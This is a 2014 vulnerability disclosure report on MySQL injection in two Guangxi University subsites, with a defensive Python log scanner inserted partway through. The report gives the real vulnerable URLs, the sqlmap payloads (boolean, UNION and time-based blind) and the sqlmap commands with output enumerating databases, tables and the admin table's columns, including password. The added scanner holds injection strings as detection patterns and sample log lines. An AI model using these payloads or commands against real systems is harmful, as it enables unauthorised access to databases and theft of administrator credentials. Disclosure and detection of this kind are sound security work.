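2014-06-05: Details reported to the vendor; awaiting vendor response
2014-06-10: Vendor chose to ignore the vulnerability; details disclosed publicly
Guangxi University subsite # MySQL Injection (1-2)
MySQL injection URLs:
First: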
http://whsz.gxu.edu.cn/index.php/Index/view?id=361
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=361 AND 8181=8181

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: id=-5136 UNION ALL SELECT NULL,CONCAT(0x7178776771,0x54665155534f6965754b,0x7168677771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
Second:
http://mi.gxu.edu.cn/content.php?id=1343
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1343 AND 8249=8249

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: id=-5225 UNION ALL SELECT NULL,NULL,CONCAT(0x7164706671,0x564f4661466b4e525479,0x7168616271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1343 AND SLEEP(5)
---
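Added example (not part of the original report): a Python sketch for defenders that flags the three technique classes sqlmap reported above (boolean-based blind, UNION query, time-based blind) in web server access logs. The log lines are constructed, the regular expressions are heuristics, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# One heuristic pattern per technique class named in the sqlmap output above.
RULES = {
    # AND/OR followed by a tautology such as 8249=8249 (same number twice)
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}
# Request line of a combined-format access log entry
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_value(value):
    """Return the names of the rules matching one decoded parameter value."""
    return [name for name, rx in RULES.items() if rx.search(value)]

def scan_log(lines):
    """Yield (line_no, parameter, techniques) for each suspicious parameter."""
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes values and turns '+' into a space
        for key, value in parse_qsl(query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                yield no, key, hits

# Constructed sample lines (documentation IP ranges, shortened payloads).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jun/2014:10:00:01 +0800] "GET /content.php?id=1343 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Jun/2014:10:00:02 +0800] "GET /content.php?id=1343%20AND%208249%3D8249 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Jun/2014:10:00:03 +0800] "GET /content.php?id=-5225%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 HTTP/1.1" 200 901',
    '203.0.113.9 - - [05/Jun/2014:10:00:09 +0800] "GET /content.php?id=1343+AND+SLEEP(5) HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jun/2014:10:00:10 +0800] "GET /index.php/Index/view?id=361&q=band+and+union HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for no, key, hits in scan_log(SAMPLE_LOG):
        print(f"line {no}: parameter {key!r} -> {', '.join(hits)}")
```

Both `id` parameters are numeric, so a log hit on either one should be read alongside a check that the application casts the value to an integer or binds it in a prepared statement.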
First:
#1. Enumerate databases:
sqlmap -u http://whsz.gxu.edu.cn/index.php/Index/view?id=361 --dbs
available databases [2]:
[*] information_schema
[*] whsz
#2. Enumerate tables:
sqlmap -u http://whsz.gxu.edu.cn/index.php/Index/view?id=361 -D whsz --tables
Database: whsz
[4 tables]
+------------------------+
| human_admin            |
| human_article_article  |
| human_article_category |
| human_visit_log        |
+------------------------+
#3. Enumerate columns:
sqlmap -u http://whsz.gxu.edu.cn/index.php/Index/view?id=361 -D whsz -T human_admin --columns
Database: whsz
Table: human_admin
[7 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| addDate  | datetime     |
| id       | int(11)      |
| ifDel    | tinyint(1)   |
| isSuper  | tinyint(1)   |
| name     | varchar(100) |
| password | varchar(255) |
| trueName | varchar(30)  |
+----------+--------------+
Second:
#1. Enumerate databases:
sqlmap -u http://mi.gxu.edu.cn/content.php?id=1343 --dbs
available databases [2]:
[*] information_schema
[*] sxxy
sqlmap -u http://mi.gxu.edu.cn/content.php?id=1343 -D sxxy --tables
Database: sxxy
[31 tables]
+--------------------+
| section            |
| user               |
| admin              |
| config             |
| friend_admin       |
| friend_book        |
| friend_user        |
| inner_news         |
| inner_newsnews     |
| jifang             |
| message            |
| msg_mo             |
| netpb_addonarticle |
| netpb_admin        |
| netpb_admintype    |
| netpb_archives     |
| netpb_arcrank      |
| netpb_arctype      |
| netpb_area         |
| netpb_channeltype  |
| netpb_error        |
| netpb_guestbook    |
| netpb_homepageset  |
| netpb_keywords     |
| netpb_member       |
| netpb_member_info  |
| netpb_memberstow   |
| netpb_pbconfig     |
| netpb_plus         |
| news               |
| sharedfiles        |
+--------------------+
:)
Severity: No impact (ignored by vendor)
Ignored at: 2014-06-10 10:39
None yet